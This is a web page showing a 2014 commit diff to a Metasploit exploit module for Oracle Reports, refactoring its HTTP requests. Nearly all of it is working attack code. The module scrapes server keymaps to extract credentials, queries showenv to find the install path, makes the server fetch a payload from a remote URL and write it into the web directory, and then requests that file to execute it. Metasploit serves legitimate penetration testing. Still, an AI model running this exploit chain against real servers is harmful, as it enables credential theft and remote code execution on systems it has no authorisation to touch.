infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated

bug/bundler_fix
Mekanismen 2014-01-31 21:59:26 +01:00
parent f6291eb9a8
commit 5a883a4477
1 changed files with 39 additions and 40 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
modules/exploits/multi/http/oracle_reports_rce.rb
View File

@ -67,19 +67,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
url = datastore['RHOST'] res = send_request_cgi({
url = "http://" + url + "/reports/rwservlet/showmap" 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showmap"),
uri = URI.parse(url) 'method' => 'GET'
begin })
html = uri.open.read
rescue unless res and res.body.include?("Reports Services")
return Exploit::CheckCode::Safe
end
if html =~ /Reports Servlet Key Map/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
return Exploit::CheckCode::Appears
end end
def exploit def exploit
@ -89,28 +86,26 @@ class Metasploit3 < Msf::Exploit::Remote
@payload_dir = datastore['PAYDIR'] @payload_dir = datastore['PAYDIR']
@local_path = "" @local_path = ""
@url = datastore['RHOST'] uri = target_uri.path
url = "http://" + @url + "/reports/rwservlet/showmap" res = send_request_cgi({
uri = URI.parse(url) 'uri' => normalize_uri(uri, "/reports/rwservlet/showmap"),
begin 'method' => 'GET'
html = uri.open.read })
rescue
fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
end
if html.include?("Reports Servlet Key Map") if res and res.body.include?("Reports Services")
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten test = res.body.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
#Parse keymaps for servers #Parse keymaps for servers
print_status "#{peer} - Enumerating keymaps ... " print_status "#{peer} - Enumerating keymaps ... "
uri = target_uri.path
test.each do |t| test.each do |t|
if not @hacked if not @hacked
t = t.delete(' ') t = t.delete(' ')
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"), 'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
'method' => 'GET', 'method' => 'GET',
}) })
if res and res.code == 200 if res and res.code == 200
if res.body =~ /userid=(.*)@/ if res.body =~ /userid=(.*)@/
authid = $1 authid = $1
@ -161,20 +156,23 @@ class Metasploit3 < Msf::Exploit::Remote
print_good "#{peer} - Found credentials: #{authid}" print_good "#{peer} - Found credentials: #{authid}"
print_status "#{peer} - Querying showenv ..." print_status "#{peer} - Querying showenv ..."
url = "http://" + @url + "/reports/rwservlet/showenv?server=#{server}&authid=#{authid}" res = send_request_cgi({
uri = URI.parse(url) 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
begin 'method' => 'GET',
html = uri.open.read 'vars_get' => {
rescue 'server' => server,
print_status("#{peer} - Query failed") 'authid' => authid
else }
if html =~ /\\(.*)\\showenv/ })
if res and res.code == 200
if res.body =~ /\\(.*)\\showenv/
print_good "#{peer} - Query succeeded!" print_good "#{peer} - Query succeeded!"
print_status "#{peer} - Windows install detected " print_status "#{peer} - Windows install detected "
print_status "#{peer} - Uploading payload ..." print_status "#{peer} - Uploading payload ..."
@local_path = $1.gsub("\\", "/") @local_path = $1.gsub("\\", "/")
setup_payload setup_payload
elsif html =~ /\/(.*)\/showenv/ elsif res.body =~ /\/(.*)\/showenv/
print_good "#{peer} - Query succeeded!" print_good "#{peer} - Query succeeded!"
print_status "#{peer} - Linux install detected" print_status "#{peer} - Linux install detected"
print_status "#{peer} - Uploading payload ..." print_status "#{peer} - Uploading payload ..."
@ -189,9 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote
def upload_payload def upload_payload
path = "/#{@local_path}#{@payload_dir}#{@payload_name}" path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
uri = target_uri.path
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(uri, "/reports/rwservlet"), 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),
'method' => 'GET', 'method' => 'GET',
'encode_params' => false, 'encode_params' => false,
'vars_get' => { 'vars_get' => {
@ -201,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
'desname' => path, 'desname' => path,
'JOBTYPE' => 'rwurl', 'JOBTYPE' => 'rwurl',
'URLPARAMETER' => @payload_url 'URLPARAMETER' => @payload_url
} }
}) })
if res and res.body.include?("Successfully run") if res and res.body.include?("Successfully run")
@ -244,12 +241,14 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exec_payload def exec_payload
print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}") if @hacked
print_status("#{peer} - Executing payload...") print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
print_status("#{peer} - Executing payload...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name), 'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),
'method' => 'GET' 'method' => 'GET'
}) })
end
end end
end end